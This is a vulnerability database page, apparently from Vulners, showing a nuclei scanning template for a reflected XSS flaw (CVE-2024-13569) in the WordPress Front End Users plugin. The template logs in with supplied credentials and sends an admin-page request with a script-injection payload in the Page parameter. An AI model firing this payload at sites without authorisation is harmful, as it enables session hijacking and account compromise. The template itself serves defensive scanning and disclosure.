Lucene search
K

WordPress Front End Users - Reflected XSS

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 9 Views

Reflected XSS in WordPress Front End Users allows script execution via crafted links targeting high privilege users.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-13569
22 Apr 202507:03
circl
CNNVD
WordPress plugin Front End Users 安全漏洞
22 Apr 202500:00
cnnvd
CVE
CVE-2024-13569
22 Apr 202506:00
cve
Cvelist
CVE-2024-13569 Front End Users <= 3.2.32 - Reflected XSS
22 Apr 202506:00
cvelist
EUVD
EUVD-2025-12288
3 Oct 202520:07
euvd
NVD
CVE-2024-13569
22 Apr 202506:15
nvd
OSV
CVE-2024-13569
22 Apr 202506:15
osv
Patchstack
WordPress Front End Users plugin < 3.2.33 - Cross Site Scripting (XSS) vulnerability
22 Apr 202521:46
patchstack
Positive Technologies
PT-2025-17486
22 Apr 202500:00
ptsecurity
RedhatCVE
CVE-2024-13569
26 Apr 202504:31
redhatcve
Rows per page
id: CVE-2024-13569

info:
  name: WordPress Front End Users - Reflected XSS
  author: Sourabh-Sahu
  severity: high
  description: |
    WordPress Front End Users plugin <= 3.2.32 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute malicious scripts in the context of high privilege users, exploit requires attacker to craft a malicious link or request.
  impact: |
    Attackers can execute malicious scripts in the context of high privilege users, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed or apply security patches that sanitize and escape output properly.
  reference:
    - https://wpscan.com/vulnerability/b9742440-0e36-4900-b58e-41c9854a62b2/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 7.1
    cve-id: CVE-2024-13569
    cwe-id: CWE-79
    epss-score: 0.00485
    epss-percentile: 0.38319
    cpe: cpe:2.3:a:etoilewebdesign:front_end_users:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: etoilewebdesign
    product: front_end_users
  tags: cve,cve2024,etoilewebdesign,front-end-users,authenticated,wordpress,wp,wp-plugin,xss

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=EWD-FEUP-options&DisplayPage=Fields&OrderBy=Field_Description&Order=DESC&Page=testxss"><script>alert(document.domain)</script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "><script>alert(document.domain)</script>","front-end-only-users")
        condition: and
# digest: 4a0a00473045022100a0925454afc3d24494afa4c5e67ae563ea5f18148551f6c50041aad638d09f020220481c2c9a101c9ecf689d89af16ce5d90f41b418d4a5f987028fffd3a3414ec1e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Feb 2026 16:59Current
7.1High risk
Vulners AI Score7.1
CVSS 3.17.1
EPSS0.00485
SSVC
9